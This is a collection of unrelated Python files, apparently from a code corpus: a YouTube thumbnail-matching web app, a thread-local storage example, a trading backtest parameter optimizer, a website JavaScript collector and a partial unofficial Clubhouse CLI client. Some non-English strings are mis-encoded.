with youtube_dl.YoutubeDL({}) as ydl:
info = ydl.extract_info(url, download=False)
return info
except Exception as e:
return e
def main(url):
info = getInformation(url)
title = info.get("title", None)
uploader = info.get("uploader", None)
vid = info.get("id", None)
if vid is None:
print("Could not find video ID")
return
print(title + " - " + uploader)
if not path.exists(dirpath + "/images/"):
os.mkdir(dirpath + "/images/")
if not path.exists(dirpath + "/thumbnails/"):
os.mkdir(dirpath + "/thumbnails/")
if not path.exists(dirpath + "/videos/"):
os.mkdir(dirpath + "/videos/")
print(downloadThumbnail(vid))
print(downloadVideo(vid))
print(convertVideoToImage(vid))
print(findThumbnail(vid))
api = responder.API()
clients = {}
@api.route("/")
def indexPage(req, response):
response.headers = {"Content-Type": "text/html; charset=utf-8"}
with open(path.dirname(path.abspath(__file__)) + "/index.html") as f:
response.text = f.read()
@api.route("/api", websocket=True)
async def youtubeThumb(ws):
await ws.accept()
key = ws.headers.get("sec-websocket-key")
clients[key] = ws
try:
while True:
print("- Process started.")
# Process 0 : Waiting url
print("[0] Waiting URL...")
await ws.send_json({
"status": True,
"process_code": 0,
"message": "Waiting URL...",
"message_ja": "URLใๅพ
ใฃใฆใใพใ..."
})
url = await ws.receive_text()
# Process 1: Received url, Get video infomation
print("[1] Getting Video Infomation...")
await ws.send_json({
"status": True,
"process_code": 1,
"message": "Getting Video Infomation...",
"message_ja": "ๅ็ปๆ
ๅ ฑใๅๅพใใฆใใพใ..."
})
await asyncio.sleep(1)
info = getInformation(url)
# Process 2 : Whether got information
if isinstance(info, Exception):
if "not a valid URL" in str(info):
info = "Invalid URL"
print("[2] Get Video Infomation failed.")
await ws.send_json({
"status": False,
"process_code": 2,
"message": "Get Video Infomation failed. <code>{}</code>".format(str(info)),
"message_ja": "ๅ็ปๆ
ๅ ฑใฎๅๅพใซๅคฑๆใใพใใ"
})
await asyncio.sleep(1)
await ws.close()
del clients[key]
return
print("[2] Get Video Infomation completed.")
await ws.send_json({
"status": True,
"process_code": 2,
"message": "Get Video Infomation completed.",
"message_ja": "ๅ็ปๆ
ๅ ฑใฎๅๅพใซๆๅใใพใใใ",
"info": {
"vid": info.get("id"),
"title": info.get("title"),
"uploader": info.get("uploader")
}
})
vid = info.get("id")
await asyncio.sleep(1)
# Process 3 : Download thumbnail image
print("[3] Downloading thumbnail image...")
await ws.send_json({
"status": True,
"process_code": 3,
"message": "Downloading thumbnail image...",
"message_ja": "ใตใ ใใคใซ็ปๅใใใฆใณใญใผใใใฆใใพใ..."
})
await asyncio.sleep(1)
# Process 4 : Whether download thumbnail image
if not downloadThumbnail(vid):
print("[4] Download thumbnail image failed.")
await ws.send_json({
"status": False,
"process_code": 4,
"message": "Download thumbnail image failed.",
"message_ja": "ใตใ ใใคใซ็ปๅใฎใใฆใณใญใผใใซๅคฑๆใใพใใใ"
})
await asyncio.sleep(1)
await ws.close()
del clients[key]
return
print("[4] Download thumbnail image completed.")
await ws.send_json({
"status": True,
"process_code": 4,
"message": "Download thumbnail image completed.",
"message_ja": "ใตใ ใใคใซ็ปๅใฎใใฆใณใญใผใใซๆๅใใพใใใ"
})
await asyncio.sleep(1)
# Process 5 : Download video
print("[5] Downloading video...")
await ws.send_json({
"status": True,
"process_code": 5,
"message": "Downloading video...",
"message_ja": "ๅ็ปใใใฆใณใญใผใใใฆใใพใ..."
})
await asyncio.sleep(1)
# Process 6 : Whether download video
dlResult = downloadVideo(vid)
if isinstance(dlResult, Exception):
print("[6] Download video failed.")
await ws.send_json({
"status": False,
"process_code": 6,
"message": "Download video failed. <code>{}</code>".format(str(dlResult)),
"message_ja": "ๅ็ปใฎใใฆใณใญใผใใซๅคฑๆใใพใใใ"
})
await asyncio.sleep(1)
await ws.close()
del clients[key]
return
print("[6] Download video completed.")
await ws.send_json({
"status": True,
"process_code": 6,
"message": "Download video completed.",
"message_ja": "ๅ็ปใฎใใฆใณใญใผใใซๆๅใใพใใใ"
})
await asyncio.sleep(1)
# Process 7 : Convert video to image
print("[7] Converting video to image...")
await ws.send_json({
"status": True,
"process_code": 7,
"message": "Converting video to image...",
"message_ja": "ๅ็ปใใ็ปๅใซๅคๆใใฆใใพใ..."
})
await asyncio.sleep(1)
# Process 8 : Whether download video
convResult = convertVideoToImage(vid)
if isinstance(convResult, Exception):
print("[8] Convert video to image failed.")
await ws.send_json({
"status": False,
"process_code": 8,
"message": "Convert video to image failed. <code>{}</code>".format(str(convResult)),
"message_ja": "ๅ็ปใใ็ปๅใธใฎๅคๆใซๅคฑๆใใพใใใ"
})
await asyncio.sleep(1)
await ws.close()
del clients[key]
return
print("[8] Convert video to image completed.")
await ws.send_json({
"status": True,
"process_code": 8,
"message": "Convert video to image completed.",
"message_ja": "ๅ็ปใใ็ปๅใธใฎๅคๆใซๆๅใใพใใใ"
})
await asyncio.sleep(1)
# Process 9 : Finding a scene that looks like a thumbnail
print("[9] Finding a scene that looks like a thumbnail...")
await ws.send_json({
"status": True,
"process_code": 9,
"message": "Finding a scene that looks like a thumbnail...",
"message_ja": "ใตใ ใใคใซ็ปๅใซๅใใทใผใณใๆขใใฆใใพใ..."
})
await asyncio.sleep(1)
# Process 10 : Whether find a scene that looks like a thumbnail
similars = findThumbnail(vid)
if len(similars) == 0:
print("[10] Not found a scene that looks like a thumbnail.")
await ws.send_json({
"status": False,
"process_code": 10,
"message": "Not found a scene that looks like a thumbnail.",
"message_ja": "ใตใ ใใคใซ็ปๅใซๅใใทใผใณใ่ฆใคใใใพใใใงใใใ"
})
await asyncio.sleep(1)
await ws.close()
del clients[key]
return
print("[10] All Completed. ")
best_image = getImageBase64(vid, next(iter(similars))[0])
print("[10] Base64 converted. ")
await ws.send_json({
"status": True,
"process_code": 10,
"message": "All Completed.",
"message_ja": "ๅ
จใฆใฎๅฆ็ใๅฎไบใใพใใใ",
"vid": vid,
"data": {
"best": next(iter(similars)),
"similars": similars
},
"best_image": best_image
})
await asyncio.sleep(1)
print("- Process finished.")
except Exception:
await ws.close()
del clients[key]
def awake():
while True:
try:
print("Start Awaking")
requests.get("https://yfts.herokuapp.com/")
print("End")
except Exception:
print("Awake request failed")
time.sleep(300)
t = threading.Thread(target=awake)
t.daemon = True
t.start()
api.run(address="0.0.0.0", port=int(os.environ.get("PORT", 5000)), workers=1)
|
threading_local_defaults.py
|
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2008 Doug Hellmann All rights reserved.
#
"""Defaults for thread-local values
"""
#end_pymotw_header
import random
import threading
import logging
logging.basicConfig(level=logging.DEBUG,
format='(%(threadName)-10s) %(message)s',
)
def show_value(data):
try:
val = data.value
except AttributeError:
logging.debug('No value yet')
else:
logging.debug('value=%s', val)
def worker(data):
show_value(data)
data.value = random.randint(1, 100)
show_value(data)
class MyLocal(threading.local):
def __init__(self, value):
logging.debug('Initializing %r', self)
self.value = value
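# Note: a threading.local subclass re-runs __init__ with the original
# arguments in every thread that first accesses the instance, so each worker
# thread below starts from value=1000 rather than seeing another thread's data.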
local_data = MyLocal(1000)
show_value(local_data)
for i in range(2):
t = threading.Thread(target=worker, args=(local_data,))
t.start()
|
WtCtaOptimizer.py
|
from json import encoder
import multiprocessing
import time
import threading
import json
import os
import math
import numpy as np
import pandas as pd
from pandas import DataFrame as df
from wtpy import WtBtEngine,EngineType
from wtpy.apps import WtBtAnalyst
def fmtNAN(val, defVal = 0):
if math.isnan(val):
return defVal
return val
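# For example: fmtNAN(float("nan")) -> 0, fmtNAN(float("nan"), -1) -> -1,
# and fmtNAN(3.5) -> 3.5.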
class ParamInfo:
'''
Parameter info class
'''
def __init__(self, name:str, start_val = None, end_val = None, step_val = None, ndigits = 1, val_list:list = None):
self.name = name # parameter name
self.start_val = start_val # start value
self.end_val = end_val # end value
self.step_val = step_val # step size
self.ndigits = ndigits # decimal places
self.val_list = val_list # explicit list of values
def gen_array(self):
if self.val_list is not None:
return self.val_list
values = list()
curVal = round(self.start_val, self.ndigits)
while curVal < self.end_val:
values.append(curVal)
curVal += self.step_val
curVal = round(curVal, self.ndigits)
if curVal >= self.end_val:
curVal = self.end_val
break
values.append(round(curVal, self.ndigits))
return values
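# For example, ParamInfo("k", start_val=0.1, end_val=0.5, step_val=0.1,
# ndigits=1).gen_array() yields [0.1, 0.2, 0.3, 0.4, 0.5].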
class WtCtaOptimizer:
'''
Parameter optimizer\n
Mainly used for optimizing strategy parameters
'''
def __init__(self, worker_num:int = 8):
'''
Constructor\n
@worker_num number of worker processes, 8 by default; set it according to the number of CPU cores
'''
self.worker_num = worker_num
self.running_worker = 0
self.mutable_params = dict()
self.fixed_params = dict()
self.env_params = dict()
self.cpp_stra_module = None
return
def add_mutable_param(self, name:str, start_val, end_val, step_val, ndigits = 1):
'''
Add a mutable parameter\n
@name parameter name\n
@start_val start value\n
@end_val end value\n
@step_val step size\n
@ndigits decimal places
'''
self.mutable_params[name] = ParamInfo(name=name, start_val=start_val, end_val=end_val, step_val=step_val, ndigits=ndigits)
def add_listed_param(self, name:str, val_list:list):
'''
Add a mutable parameter restricted to a list of values\n
@name parameter name\n
@val_list list of parameter values
'''
self.mutable_params[name] = ParamInfo(name=name, val_list=val_list)
def add_fixed_param(self, name:str, val):
'''
Add a fixed parameter\n
@name parameter name\n
@val value\n
'''
self.fixed_params[name] = val
return
def set_strategy(self, typeName:type, name_prefix:str):
'''
Set the strategy\n
@typeName strategy class\n
@name_prefix naming prefix used for auto-generated names, usually of the form "prefix_param1name_param1value_param2name_param2value"
'''
self.strategy_type = typeName
self.name_prefix = name_prefix
return
def set_cpp_strategy(self, module:str, type_name:type, name_prefix:str):
'''
Set a C++ strategy\n
@module module file\n
@type_name strategy class\n
@name_prefix naming prefix used for auto-generated names, usually of the form "prefix_param1name_param1value_param2name_param2value"
'''
self.cpp_stra_module = module
self.cpp_stra_type = type_name
self.name_prefix = name_prefix
return
def config_backtest_env(self, deps_dir:str, cfgfile:str="configbt.json", storage_type:str="csv", storage_path:str = None, db_config:dict = None):
'''
Configure the backtest environment\n
@deps_dir dependency file directory\n
@cfgfile config file name\n
@storage_type storage type, e.g. csv/bin\n
@storage_path storage path
'''
self.env_params["deps_dir"] = deps_dir
self.env_params["cfgfile"] = cfgfile
self.env_params["storage_type"] = storage_type
if storage_path is None and db_config is None:
raise Exception("storage_path and db_config cannot be both None!")
if storage_type == 'db' and db_config is None:
raise Exception("db_config cannot be None while storage_type is db!")
self.env_params["storage_path"] = storage_path
self.env_params["db_config"] = db_config
def config_backtest_time(self, start_time:int, end_time:int):
'''
Configure the backtest period; call multiple times to set up several backtest time ranges\n
@start_time start time, to the minute, in the format 201909100930\n
@end_time end time, to the minute, in the format 201909100930
'''
if "time_ranges" not in self.env_params:
self.env_params["time_ranges"] = []
self.env_params["time_ranges"].append([start_time,end_time])
def __gen_tasks__(self, markerfile:str = "strategies.json"):
'''
Generate backtest tasks
'''
param_names = self.mutable_params.keys()
param_values = dict()
# First generate the value array for each parameter
# and count how many parameter combinations there are in total
total_groups = 1
for name in param_names:
paramInfo = self.mutable_params[name]
values = paramInfo.gen_array()
param_values[name] = values
total_groups *= len(values)
# Then generate the final parameter dict for each combination
param_groups = list()
stra_names = dict()
time_ranges = self.env_params["time_ranges"]
for time_range in time_ranges:
start_time = time_range[0]
end_time = time_range[1]
for i in range(total_groups):
k = i
thisGrp = self.fixed_params.copy() # copy the fixed parameters
endix = ''
for name in param_names:
cnt = len(param_values[name])
curVal = param_values[name][k%cnt]
tname = type(curVal)
if tname.__name__ == "list":
val_str = ''
for item in curVal:
val_str += str(item)
val_str += "_"
val_str = val_str[:-1]
thisGrp[name] = curVal
endix += name
endix += "_"
endix += val_str
endix += "_"
else:
thisGrp[name] = curVal
endix += name
endix += "_"
endix += str(curVal)
endix += "_"
k = math.floor(k / cnt)
endix = endix[:-1]
straName = self.name_prefix + endix
straName += "_%d_%d" % (start_time, end_time)
thisGrp["name"] = straName
thisGrp["start_time"] = start_time
thisGrp["end_time"] = end_time
stra_names[straName] = thisGrp
param_groups.append(thisGrp)
# Write each parameter combination and its strategy ID to a file for later analysis
f = open(markerfile, "w")
f.write(json.dumps(obj=stra_names, sort_keys=True, indent=4))
f.close()
return param_groups
def __analyze_result__(self, strName:str, time_range:tuple, params:dict):
folder = "./outputs_bt/%s/" % (strName)
df_closes = pd.read_csv(folder + "closes.csv")
df_funds = pd.read_csv(folder + "funds.csv")
df_wins = df_closes[df_closes["profit"]>0]
df_loses = df_closes[df_closes["profit"]<=0]
ay_WinnerBarCnts = df_wins["closebarno"]-df_wins["openbarno"]
ay_LoserBarCnts = df_loses["closebarno"]-df_loses["openbarno"]
total_winbarcnts = ay_WinnerBarCnts.sum()
total_losebarcnts = ay_LoserBarCnts.sum()
total_fee = df_funds.iloc[-1]["fee"]
totaltimes = len(df_closes) # total number of trades
wintimes = len(df_wins) # number of winning trades
losetimes = len(df_loses) # number of losing trades
winamout = df_wins["profit"].sum() # gross profit
loseamount = df_loses["profit"].sum() # gross loss
trdnetprofit = winamout + loseamount # net trading P&L
accnetprofit = trdnetprofit - total_fee # net account P&L
winrate = wintimes / totaltimes if totaltimes>0 else 0 # win rate
avgprof = trdnetprofit/totaltimes if totaltimes>0 else 0 # average P&L per trade
avgprof_win = winamout/wintimes if wintimes>0 else 0 # average profit per winning trade
avgprof_lose = loseamount/losetimes if losetimes>0 else 0 # average loss per losing trade
winloseratio = abs(avgprof_win/avgprof_lose) if avgprof_lose!=0 else "N/A" # win/loss ratio
max_consecutive_wins = 0 # maximum consecutive wins
max_consecutive_loses = 0 # maximum consecutive losses
avg_bars_in_winner = total_winbarcnts/wintimes if wintimes>0 else "N/A"
avg_bars_in_loser = total_losebarcnts/losetimes if losetimes>0 else "N/A"
consecutive_wins = 0
consecutive_loses = 0
for idx, row in df_closes.iterrows():
profit = row["profit"]
if profit > 0:
consecutive_wins += 1
consecutive_loses = 0
else:
consecutive_wins = 0
consecutive_loses += 1
max_consecutive_wins = max(max_consecutive_wins, consecutive_wins)
max_consecutive_loses = max(max_consecutive_loses, consecutive_loses)
summary = params.copy()
summary["ๅผๅงๆถ้ด"] = time_range[0]
summary["็ปๆๆถ้ด"] = time_range[1]
summary["ๆปไบคๆๆฌกๆฐ"] = totaltimes
summary["็ๅฉๆฌกๆฐ"] = wintimes
summary["ไบๆๆฌกๆฐ"] = losetimes
summary["ๆฏ็ๅฉ"] = float(winamout)
summary["ๆฏไบๆ"] = float(loseamount)
summary["ไบคๆๅ็ไบ"] = float(trdnetprofit)
summary["่็"] = winrate*100
summary["ๅๆฌกๅนณๅ็ไบ"] = avgprof
summary["ๅๆฌก็ๅฉๅๅผ"] = avgprof_win
summary["ๅๆฌกไบๆๅๅผ"] = avgprof_lose
summary["ๅๆฌก็ไบๅๅผๆฏ"] = winloseratio
summary["ๆๅคง่ฟ็ปญ็ๅฉๆฌกๆฐ"] = max_consecutive_wins
summary["ๆๅคง่ฟ็ปญไบๆๆฌกๆฐ"] = max_consecutive_loses
summary["ๅนณๅ็ๅฉๅจๆ"] = avg_bars_in_winner
summary["ๅนณๅไบๆๅจๆ"] = avg_bars_in_loser
summary["ๅนณๅ่ดฆๆทๆถ็็"] = accnetprofit/totaltimes
f = open(folder+"summary.json", mode="w")
f.write(json.dumps(obj=summary, indent=4))
f.close()
return
def __execute_task__(self, params:dict):
'''
Execute a single backtest task\n
@params parameters in key-value form
'''
name = params["name"]
f = open("logcfg_tpl.json", "r")
content =f.read()
f.close()
content = content.replace("$NAME$", name)
engine = WtBtEngine(eType=EngineType.ET_CTA, logCfg=content, isFile=False)
engine.init(self.env_params["deps_dir"], self.env_params["cfgfile"])
engine.configBacktest(params["start_time"], params["end_time"])
engine.configBTStorage(mode=self.env_params["storage_type"], path=self.env_params["storage_path"], dbcfg=self.env_params["db_config"])
time_range = (params["start_time"], params["end_time"])
# Remove the redundant parameters
params.pop("start_time")
params.pop("end_time")
if self.cpp_stra_module is not None:
params.pop("name")
engine.setExternalCtaStrategy(name, self.cpp_stra_module, self.cpp_stra_type, params)
else:
straInfo = self.strategy_type(**params)
engine.set_cta_strategy(straInfo)
engine.commitBTConfig()
engine.run_backtest()
engine.release_backtest()
self.__analyze_result__(name, time_range, params)
def __start_task__(self, params:dict):
'''
Start a single backtest task\n
A thread is used here to launch the child process so that the total number of worker processes can be controlled\n
The thread can join on the child process and update the running_worker counter once it finishes\n
running_worker cannot be updated inside __execute_task__ because it runs in a different process, so the data would not be synchronized\n
@params parameters in key-value form
'''
p = multiprocessing.Process(target=self.__execute_task__, args=(params,))
p.start()
p.join()
self.running_worker -= 1
print("ๅทฅไฝ่ฟ็จ%dไธช" % (self.running_worker))
def go(self, interval:float = 0.2, out_marker_file:str = "strategies.json", out_summary_file:str = "total_summary.csv"):
'''
Start the optimizer\n
@interval polling interval in seconds\n
@out_marker_file marker file name, used for analysis after the backtests finish
'''
self.tasks = self.__gen_tasks__(out_marker_file)
self.running_worker = 0
total_task = len(self.tasks)
left_task = total_task
while True:
if left_task == 0:
break
if self.running_worker < self.worker_num:
params = self.tasks[total_task-left_task]
left_task -= 1
print("ๅฉไฝไปปๅก%dไธช" % (left_task))
p = threading.Thread(target=self.__start_task__, args=(params,))
p.start()
self.running_worker += 1
print("ๅทฅไฝ่ฟ็จ%dไธช" % (self.running_worker))
else:
time.sleep(interval)
# Finally, once all tasks have been launched, wait for all worker processes to finish
while True:
if self.running_worker == 0:
break
else:
time.sleep(interval)
# Aggregate the backtest results
f = open(out_marker_file, "r")
content = f.read()
f.close()
obj_stras = json.loads(content)
total_summary = list()
for straName in obj_stras:
filename = "./outputs_bt/%s/summary.json" % (straName)
if not os.path.exists(filename):
print("%sไธๅญๅจ๏ผ่ฏทๆฃๆฅๆฐๆฎ" % (filename))
continue
f = open(filename, "r")
content = f.read()
f.close()
obj_summary = json.loads(content)
total_summary.append(obj_summary)
df_summary = df(total_summary)
# df_summary = df_summary.drop(labels=["name"], axis='columns')
df_summary.to_csv(out_summary_file, encoding='utf-8-sig')
def analyze(self, out_marker_file:str = "strategies.json", out_summary_file:str = "total_summary.csv"):
# Aggregate the backtest results
f = open(out_marker_file, "r")
content = f.read()
f.close()
total_summary = list()
obj_stras = json.loads(content)
for straName in obj_stras:
params = obj_stras[straName]
filename = "./outputs_bt/%s/summary.json" % (straName)
if not os.path.exists(filename):
print("%sไธๅญๅจ๏ผ่ฏทๆฃๆฅๆฐๆฎ" % (filename))
continue
time_range = (params["start_time"],params["end_time"])
self.__analyze_result__(straName, time_range, params)
f = open(filename, "r")
content = f.read()
f.close()
obj_summary = json.loads(content)
total_summary.append(obj_summary)
df_summary = df(total_summary)
df_summary = df_summary.drop(labels=["name"], axis='columns')
df_summary.to_csv(out_summary_file)
def analyzer(self, out_marker_file:str = "strategies.json", init_capital=500000, rf=0.02, annual_trading_days=240):
for straname in json.load(open(out_marker_file, mode='r')).keys():
try:
analyst = WtBtAnalyst()
analyst.add_strategy(straname, folder="./outputs_bt/%s/"%straname, init_capital=init_capital, rf=rf, annual_trading_days=annual_trading_days)
analyst.run()
except Exception:
pass
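# A minimal usage sketch for the optimizer; `MyStrategy` and the paths below
# are assumptions, not part of this module:
#
#   optimizer = WtCtaOptimizer(worker_num=4)
#   optimizer.add_mutable_param("days", start_val=20, end_val=60, step_val=5, ndigits=0)
#   optimizer.add_fixed_param("code", "CFFEX.IF.HOT")
#   optimizer.set_strategy(MyStrategy, name_prefix="MyStrategy_")
#   optimizer.config_backtest_env(deps_dir="./common/", cfgfile="configbt.json",
#                                 storage_type="csv", storage_path="./storage/")
#   optimizer.config_backtest_time(201909100930, 202009100930)
#   optimizer.go()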
|
collectCode.py
|
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin
import re
import time
import argparse
from collectSources import get_sources
import utils
import multiprocessing
globals_ = utils.load_globals()
def get_url_javascript(url, driver, response):
""" Get code from a website
Args:
url (str): url of the website
driver (Chrome driver): Chrome driver used to visit the site
response (multiprocessing.Value): Shared boolean flag, cleared when the visit fails
"""
try:
urlName = utils.get_url_name(url)
outputDir = globals_['COLLECT_WEB_OUTPUT_DIR'] + urlName
utils.make_dir(outputDir)
time.sleep(2)
driver.get(url)
time.sleep(5)
# get the HTML content
html = driver.page_source
#parse HTML using beautiful soup
soup = bs(html, "html.parser")
scripts = soup.find_all("script")
extension = ".js"
scriptNr = 0
for script in scripts:
src = script.attrs.get("src")
type_ = script.attrs.get("type")
if not type_ or type_ == "text/javascript" or type_ == "application/javascript":
if src:
ref = urljoin(url, src)
minified = re.search(r'\.min\.js$', ref)
if minified:
extension = ".min.js"
outputFileDir = outputDir + globals_['DIR_SEPARATOR'] + urlName + globals_['DEFAULT_SEPARATOR'] + str(scriptNr) + globals_['DEFAULT_SEPARATOR'] + "ref" + extension
utils.download_url_javascript(ref, outputFileDir)
else:
outputFileDir = outputDir + globals_['DIR_SEPARATOR'] + urlName + globals_['DEFAULT_SEPARATOR'] + str(scriptNr) + globals_['DEFAULT_SEPARATOR'] + "inline" + extension
utils.write_to_file(outputFileDir, script.string)
scriptNr += 1
utils.write_to_log_on_success(url, globals_['COLLECT_WEB_LOG_FILE_DIR'])
except Exception as e:
utils.write_to_log_on_failure(url, globals_['COLLECT_WEB_LOG_FILE_DIR'], str(e))
response.value = False
if driver != "":
driver.quit()
def scrap_web(number_urls, start_at):
""" Get code from websites
Args:
number_urls (int): number of sites to visit
start_at (int): index in urlsToVisit.txt list of the first site to visit
"""
urlsToVisit = utils.get_urls_to_visit()
if start_at > len(urlsToVisit):
print("Invalid starting point. start_at must be lower than or equal to " + str(len(urlsToVisit)))
return
failCount = 0
startIndex = start_at-1
if start_at+number_urls-1 >= len(urlsToVisit):
endIndex = len(urlsToVisit)
else:
endIndex = start_at+number_urls-1
urlsToVisit = urlsToVisit[startIndex:endIndex]
for url in urlsToVisit:
if failCount > 10:
print("Failed too much")
break
response = multiprocessing.Value('b', True)  # shared flag so the child process can report failure
try:
driver = utils.setup_driver()
except Exception:
driver = ""
p = multiprocessing.Process(target=get_url_javascript, name="get_url_javascript", args=(url,driver, response))
p.start()
p.join(5*60)
if p.is_alive():
p.terminate()
p.join()
utils.write_to_log_on_failure(url, globals_['COLLECT_WEB_LOG_FILE_DIR'], "Process killed due to timeout.")
driver.quit()
if not response.value:
failCount += 1
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--collect_option", type=str)
parser.add_argument("--number_urls", type=str)
parser.add_argument("--start_at", type=str)
args = parser.parse_args()
number_urls = int(args.number_urls)
start_at = int(args.start_at)
if(args.collect_option == "code"):
scrap_web(number_urls, start_at)
if(args.collect_option == "sources"):
get_sources(number_urls, start_at)
|
cli.py
|
"""
cli.py
Sample CLI Clubhouse Client
RTC: For voice communication
"""
import os
import sys
import threading
import configparser
import keyboard
from rich.table import Table
from rich.console import Console
from clubhouse.clubhouse import Clubhouse
# Set some global variables
try:
import agorartc
RTC = agorartc.createRtcEngineBridge()
eventHandler = agorartc.RtcEngineEventHandlerBase()
RTC.initEventHandler(eventHandler)
# 0xFFFFFFFE will exclude Chinese servers from Agora's servers.
RTC.initialize(Clubhouse.AGORA_KEY, None, agorartc.AREA_CODE_GLOB & 0xFFFFFFFE)
# Enhance voice quality
if RTC.setAudioProfile(
agorartc.AUDIO_PROFILE_MUSIC_HIGH_QUALITY_STEREO,
agorartc.AUDIO_SCENARIO_GAME_STREAMING
) < 0:
print("[-] Failed to set the high quality audio profile")
except ImportError:
RTC = None
def set_interval(interval):
""" (int) -> decorator
set_interval decorator
"""
def decorator(func):
def wrap(*args, **kwargs):
stopped = threading.Event()
def loop():
while not stopped.wait(interval):
ret = func(*args, **kwargs)
if not ret:
break
thread = threading.Thread(target=loop)
thread.daemon = True
thread.start()
return stopped
return wrap
return decorator
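# Usage sketch: the decorated function runs every `interval` seconds on a
# daemon thread until it returns a falsy value or the returned Event is set.
# (`heartbeat` below is a hypothetical example, not part of this client.)
#
#   @set_interval(5)
#   def heartbeat():
#       print("ping")
#       return True           # keep looping
#
#   stop_event = heartbeat()  # starts the loop
#   stop_event.set()          # stops it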
def write_config(user_id, user_token, user_device, filename='setting.ini'):
""" (str, str, str, str) -> bool
Write Config. return True on successful file write
"""
config = configparser.ConfigParser()
config["Account"] = {
"user_device": user_device,
"user_id": user_id,
"user_token": user_token,
}
with open(filename, 'w') as config_file:
config.write(config_file)
return True
def read_config(filename='setting.ini'):
""" (str) -> dict of str
Read Config
"""
config = configparser.ConfigParser()
config.read(filename)
if "Account" in config:
return dict(config['Account'])
return dict()
def process_onboarding(client):
""" (Clubhouse) -> NoneType
This is to process the initial setup for the first time user.
"""
print("=" * 30)
print("Welcome to Clubhouse!\n")
print("The registration is not yet complete.")
print("Finish the process by entering your legal name and your username.")
print("WARNING: THIS FEATURE IS PURELY EXPERIMENTAL.")
print(" YOU CAN GET BANNED FOR REGISTERING FROM THE CLI ACCOUNT.")
print("=" * 30)
while True:
user_realname = input("[.] Enter your legal name (John Smith): ")
user_username = input("[.] Enter your username (elonmusk1234): ")
user_realname_split = user_realname.split(" ")
if len(user_realname_split) != 2:
print("[-] Please enter your legal name properly.")
continue
if not (user_realname_split[0].isalpha() and
user_realname_split[1].isalpha()):
print("[-] Your legal name is supposed to be written in alphabets only.")
continue
if len(user_username) > 16:
print("[-] Your username exceeds above 16 characters.")
continue
if not user_username.isalnum():
print("[-] Your username is supposed to be in alphanumerics only.")
continue
client.update_name(user_realname)
result = client.update_username(user_username)
if not result['success']:
print(f"[-] You failed to update your username. ({result})")
continue
result = client.check_waitlist_status()
if not result['success']:
print("[-] Your registration failed.")
print(f" It's better to sign up from a real device. ({result})")
continue
print("[-] Registration Complete!")
print(" Try registering by real device if this process pops again.")
break
def print_channel_list(client, max_limit=20):
""" (Clubhouse) -> NoneType
Print list of channels
"""
# Get channels and print out
console = Console()
table = Table(show_header=True, header_style="bold magenta")
table.add_column("")
table.add_column("channel_name", style="cyan", justify="right")
table.add_column("topic")
table.add_column("speaker_count")
channels = client.get_channels()['channels']
i = 0
for channel in channels:
i += 1
if i > max_limit:
break
_option = ""
_option += "\xEE\x85\x84" if channel['is_social_mode'] or channel['is_private'] else ""
table.add_row(
str(_option),
str(channel['channel']),
str(channel['topic']),
str(int(channel['num_speakers'])),
)
console.print(table)
def chat_main(client):
""" (Clubhouse) -> NoneType
Main function for chat
"""
max_limit = 100
channel_speaker_permission = False
_wait_func = None
_ping_func = None
def _request_speaker_permission(client, channel_name, user_id):
""" (str) -> bool
Raise hands for permissions
"""
if not channel_speaker_permission:
client.audience_reply(channel_name, True, False)
_wait_func = _wait_speaker_permission(client, channel_name, user_id)
print("[/] You've raised your hand. Wait for the moderator to give you the permission.")
@set_interval(30)
def _ping_keep_alive(client, channel_name):
""" (str) -> bool
Continue to ping alive every 30 seconds.
"""
client.active_ping(channel_name)
return True
@set_interval(10)
def _wait_speaker_permission(client, channel_name, user_id):
""" (str) -> bool
Function that runs when you've requested for a voice permission.
"""
# Get some random users from the channel.
_channel_info = client.get_channel(channel_name)
if _channel_info['success']:
for _user in _channel_info['users']:
if _user['user_id'] != user_id:
user_id = _user['user_id']
break
# Check if the moderator allowed your request.
res_inv = client.accept_speaker_invite(channel_name, user_id)
if res_inv['success']:
print("[-] Now you have a speaker permission.")
print(" Please re-join this channel to activate a permission.")
return False
return True
while True:
# Choose which channel to enter.
# Join the talk on success.
user_id = client.HEADERS.get("CH-UserID")
print_channel_list(client, max_limit)
channel_name = input("[.] Enter channel_name: ")
channel_info = client.join_channel(channel_name)
if not channel_info['success']:
# Check if this channel_name was taken from the link
channel_info = client.join_channel(channel_name, "link", "e30=")
if not channel_info['success']:
print(f"[-] Error while joining the channel ({channel_info['error_message']})")
continue
# List currently available users (TOP 20 only.)
# Also, check for the current user's speaker permission.
channel_speaker_permission = False
console = Console()
table = Table(show_header=True, header_style="bold magenta")
table.add_column("user_id", style="cyan", justify="right")
table.add_column("username")
table.add_column("name")
table.add_column("is_speaker")
table.add_column("is_moderator")
users = channel_info['users']
i = 0
for user in users:
i += 1
if i > max_limit:
break
table.add_row(
str(user['user_id']),
str(user['username']),
str(user['name']),
str(user['is_speaker']),
str(user['is_moderator']),
)
# Check if the user is the speaker
if user['user_id'] == int(user_id):
channel_speaker_permission = bool(user['is_speaker'])
console.print(table)
# Check for the voice level.
if RTC:
token = channel_info['token']
RTC.joinChannel(token, channel_name, "", int(user_id))
else:
print("[!] Agora SDK is not installed.")
print(" You may not speak or listen to the conversation.")
# Activate pinging
client.active_ping(channel_name)
_ping_func = _ping_keep_alive(client, channel_name)
_wait_func = None
# Add raise_hands key bindings for speaker permission
# Sorry for the bad quality
if not channel_speaker_permission:
if sys.platform == "darwin": # OSX
_hotkey = "9"
elif sys.platform == "win32": # Windows
_hotkey = "ctrl+shift+h"
print(f"[*] Press [{_hotkey}] to raise your hands for the speaker permission.")
keyboard.add_hotkey(
_hotkey,
_request_speaker_permission,
args=(client, channel_name, user_id)
)
input("[*] Press [Enter] to quit conversation.\n")
keyboard.unhook_all()
# Safely leave the channel upon quitting the channel.
if _ping_func:
_ping_func.set()
if _wait_func:
_wait_func.set()
if RTC:
RTC.leaveChannel()
client.leave_channel(channel_name)
def user_authentication(client):
""" (Clubhouse) -> NoneType
Just for authenticating the user.
"""
result = None
while True:
user_phone_number = input("[.] Please enter your phone number. (+818043217654) > ")
result = client.start_phone_number_auth(user_phone_number)
if not result['success']:
print(f"[-] Error occured during authentication. ({result['error_message']})")
continue
break
result = None
while True:
verification_code = input("[.] Please enter the SMS verification code (1234, 0000, ...) > ")
result = client.complete_phone_number_auth(user_phone_number, verification_code)
if not result['success']:
print(f"[-] Error occured during authentication. ({result['error_message']})")
continue
break
user_id = result['user_profile']['user_id']
user_token = result['auth_token']
